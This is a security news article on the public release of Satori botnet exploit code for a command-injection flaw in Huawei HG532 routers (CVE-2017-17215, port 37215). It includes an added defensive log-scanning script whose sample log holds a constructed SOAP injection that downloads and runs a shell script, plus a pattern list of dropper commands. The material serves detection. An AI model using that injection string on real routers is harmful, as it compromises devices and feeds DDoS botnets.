Researchers warn that now that it has been made public, the Satori malware code could be used in new botnets.
Code used in the Satori malware (a variant of the Mirai IoT malware) has been made public. Ankit Anubhav, principal researcher at security firm NewSky Security, found the code available free of charge on Pastebin.com over Christmas.
In a blog post, he said the exploit has already been weaponized in two distinct IoT botnets, Satori and BrickerBot. It has been used to attack thousands of IoT devices, including Huawei routers.
According to security researchers, there is now a risk that the code will be used by criminals to recruit IoT devices into a botnet to carry out DDoS attacks.
He added that CVE-2017-17215, a vulnerability in Huawei HG532 devices, was discovered by Check Point during a zero-day Satori attack and was discreetly reported to Huawei for a fix.
“The proof of concept code was not made public to prevent attackers from abusing it. However, with the release of the full code now by the threat actor, we expect its usage in more cases by script kiddies and copy-paste botnet masters,” he said.
“An authenticated attacker could send malicious packets to port 37215 to launch attacks,” Huawei said in its security advisory. “Successful exploit could lead to the remote execution of arbitrary code.”
Check Point said that the vulnerability stems from Huawei’s implementation of the Universal Plug and Play (UPnP) protocol via the TR-064 technical report standard. The flaw let remote attackers inject arbitrary commands, which is how compromised devices were recruited into the Satori botnet.
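For defenders, the two details the page gives are enough for a coarse detection rule: the attack arrives as a SOAP request on TCP port 37215 and carries shell commands inside the XML. The script below is an added example, not Check Point’s, Huawei’s or the Satori author’s code. It scans constructed access-log lines (the `src dport method path status body` layout, the `/upnp/control` path, the `NewValue` element and the list of shell markers are all assumptions, and the LAN ranges are assumed trusted) and raises an alert for a SOAP POST to 37215 that contains shell metacharacters or download commands, and a lower-confidence alert for any SOAP POST to that port from outside the LAN.

```python
"""Flag command-injection attempts against TCP/37215 (the port named in Huawei's
advisory) in HTTP access-log lines. Added example: log format, path, element names,
marker list and trusted ranges are assumptions, not part of any published exploit."""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional

SUSPECT_PORT = 37215  # TR-064/UPnP service port from the Huawei advisory

# Assumed trusted ranges; a router's own LAN may legitimately talk to this port.
LAN_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Shell-injection markers typical of IoT droppers (assumed list; tune for your environment).
INJECTION_MARKERS = re.compile(
    r"\$\(|`|\|\||&&|;\s*(?:wget|curl|chmod|busybox|sh)\b|\bwget\b|\bcurl\b|\bbusybox\b|/tmp/"
)
SOAP_ENVELOPE = re.compile(r"<(?:\w+:)?Envelope\b", re.IGNORECASE)

# Assumed log layout: "<src_ip> <dst_port> <method> <path> <status> <request body>"
LINE_RE = re.compile(
    r"^(?P<src>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<dport>\d+)\s+(?P<method>[A-Z]+)\s+"
    r"(?P<path>\S+)\s+(?P<status>\d{3})\s+(?P<body>.*)$"
)


@dataclass
class Alert:
    src: str
    path: str
    reason: str


def inspect_line(line: str) -> Optional[Alert]:
    """Return an Alert for a suspicious SOAP POST to port 37215, else None."""
    m = LINE_RE.match(line)
    if not m or int(m["dport"]) != SUSPECT_PORT:
        return None
    src, body = m["src"], m["body"]
    if m["method"] != "POST" or not SOAP_ENVELOPE.search(body):
        return None  # only SOAP POSTs reach the TR-064 handler
    hit = INJECTION_MARKERS.search(body)
    if hit:
        return Alert(src, m["path"], f"shell payload marker {hit.group(0)!r} in SOAP body")
    if not any(ipaddress.ip_address(src) in net for net in LAN_NETS):
        return Alert(src, m["path"], "SOAP request to TR-064 port from outside the LAN")
    return None


def scan_log(text: str) -> List[Alert]:
    """Run inspect_line over every line of a log and collect the alerts."""
    return [a for a in (inspect_line(line) for line in text.splitlines()) if a]


# Constructed sample log: one injection attempt, one benign LAN call, one unrelated
# request, and one WAN probe of the port without a payload.
SAMPLE_LOG = """\
203.0.113.7 37215 POST /upnp/control 200 <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><u:SetValue><NewValue>$(wget http://198.51.100.9/bin.sh -O /tmp/x;chmod 777 /tmp/x;/tmp/x)</NewValue></u:SetValue></s:Body></s:Envelope>
192.168.1.20 37215 POST /upnp/control 200 <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><u:GetInfo/></s:Body></s:Envelope>
198.51.100.4 80 GET /index.html 200 -
203.0.113.9 37215 POST /upnp/control 401 <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><u:GetInfo/></s:Body></s:Envelope>
"""

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The second, payload-free alert is deliberately weaker: the advisory says the attacker must be authenticated, so an unauthenticated probe from the WAN is reconnaissance rather than proof of compromise, but the port should not be reachable from the Internet at all, and seeing it there is the finding a practitioner acts on first.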
“IoT attacks are becoming modular day by day. When an IoT exploit becomes freely available, it hardly takes much time for threat actors to up their arsenal and implement the exploit as one of the attack vectors in their botnet code,” said Anubhav.